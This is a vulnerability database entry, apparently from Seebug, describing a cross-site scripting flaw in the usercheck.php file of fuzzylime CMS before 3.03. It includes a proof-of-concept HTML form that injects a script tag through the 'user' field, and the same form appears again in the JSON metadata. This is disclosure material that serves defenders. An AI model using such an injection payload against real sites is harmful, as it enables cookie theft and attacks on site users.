fuzzylime (cms) 3.0 'usercheck.php' Cross Site Scripting Vulnerability
2014-07-01T00:00:00
ID SSV:85691 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/31306/info
fuzzylime (cms) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected site. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to fuzzylime (cms) 3.03 are vulnerable.
<form method="post" action="http://www.example.com/fuzzylime/admin/usercheck.php"> <input type="hidden" name="log" value="in"> <input type="text" name="user"value='"><script>alert(1)</script>'> <input type=submit></form>
{"lastseen": "2017-11-19T16:24:52", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2017-11-19T16:24:52", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:24:52", "rev": 2}, "vulnersScore": -0.5}, "href": "https://www.seebug.org/vuldb/ssvid-85691", "references": [], "enchantments_done": [], "id": "SSV:85691", "title": "fuzzylime (cms) 3.0 'usercheck.php' Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 1, "sourceData": "\n source: http://www.securityfocus.com/bid/31306/info\r\n\r\nfuzzylime (cms) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.\r\n\r\nExploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected site. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.\r\n\r\nVersions prior to fuzzylime (cms) 3.03 are vulnerable. \r\n\r\n<form method="post" action="http://www.example.com/fuzzylime/admin/usercheck.php"> <input type="hidden" name="log" value="in"> <input type="text" name="user"value='"><script>alert(1)</script>'> <input type=submit></form> \n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-85691", "type": "seebug"}